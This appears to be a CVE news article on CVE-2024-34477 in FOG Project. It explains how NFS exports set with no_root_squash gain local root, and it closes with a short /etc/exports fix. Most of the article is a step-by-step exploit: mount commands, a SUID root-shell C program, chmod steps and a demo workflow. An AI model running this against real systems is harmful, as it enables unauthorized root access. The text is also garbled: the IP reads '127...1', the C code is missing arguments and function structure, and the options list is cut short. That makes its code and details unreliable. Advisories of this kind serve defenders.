CVE CyberSecurity Database News

CVE-2024-34477 - Privilege Escalation in FOG Project via configureNFS—How Unprotected NFS Can Let Local Users Become Root

Poster -

The FOG Project is a free open-source cloning and imaging solution for managing large numbers of computers. It is commonly used in schools, offices, and data centers. However, if you’re running FOG through version 1.5.10, you should be aware of CVE-2024-34477—a critical vulnerability that could let a local user gain root privileges by exploiting the way NFS shares are configured.

In this in-depth article, we’ll break down what causes CVE-2024-34477, explain how a user might exploit it, and show you actual code snippets to help you understand the risk. Everything will be explained simply and clearly, so you don’t need to be a Linux expert to follow along.

Understanding the Vulnerability

The root issue is in the configureNFS function inside the lib/common/functions.sh file. When FOG sets up its Network File System (NFS) shares, it uses unsafe export options:

insecure: This allows connections from any port, weakening security even further.

What this means: Any local user who can mount the NFS export can potentially upload—or even create—a malicious file that is owned by root, and then flip on the SUID (Set User ID) bit. Once that's done, running that file gives them root privileges.

How It Happens: Step by Step

Let’s break down exploitation of CVE-2024-34477 in simple steps.

`bash

/images *(rw,sync,no_root_squash,insecure,no_subtree_check)

`bash

mkdir /tmp/fogmnt
mount -t nfs 127...1:/images /tmp/fogmnt

Create or Upload a Root-owned File

Thanks to no_root_squash, any file created is owned by root. Here’s an example C program (rootshell.c) that spawns a root shell:

`c

// rootshell.c

setuid(); setgid();

system("/bin/sh");

return ;

}

gcc rootshell.c -o rootshell

cp rootshell /tmp/fogmnt/rootshell

`bash

chmod u+s /tmp/fogmnt/rootshell
ls -l /tmp/fogmnt/rootshell

`

-rwsr-xr-x 1 root root 12345 Jun 15 14:00 /tmp/fogmnt/rootshell

`bash

/images/rootshell

Exploit Demo: Real-World Example

Below is a sample exploit workflow. These actions assume you are a local (non-root) user on a FOG server running version <=1.5.10.

# 1. Mount the NFS export as your own user
mkdir -p /tmp/nfs
mount -t nfs 127...1:/images /tmp/nfs

# 2. Prepare a SUID-root shell (as in C code above)
echo 'int main(){setuid();system("/bin/sh");}' > /tmp/sh.c
gcc /tmp/sh.c -o /tmp/sh
cp /tmp/sh /tmp/nfs/sh
chmod 4755 /tmp/nfs/sh

# 3. Unmount just to simulate real-world scenario
umount /tmp/nfs

# 4. Run the SUID shell as a regular user
/images/sh

Short-Term Fix

1. Edit /etc/exports to Remove no_root_squash and insecure

`

/images *(rw,sync,no_root_squash,insecure,no_subtree_check)

`

/images *(rw,sync,root_squash,no_subtree_check)

References

- FOG Project GitHub
- CVE-2024-34477 on cve.org
- NFS security best practices (RedHat Docs)

Conclusion

CVE-2024-34477 is a dangerous, easy-to-exploit local privilege escalation bug in FOG’s NFS configuration. If you are running FOG up to version 1.5.10, check your NFS exports NOW, remove any unsafe export options, and monitor for unusual file activity on your NFS mounts.

Timeline

Published on: 05/27/2024 14:15:09 UTC
Last modified on: 08/26/2024 15:35:10 UTC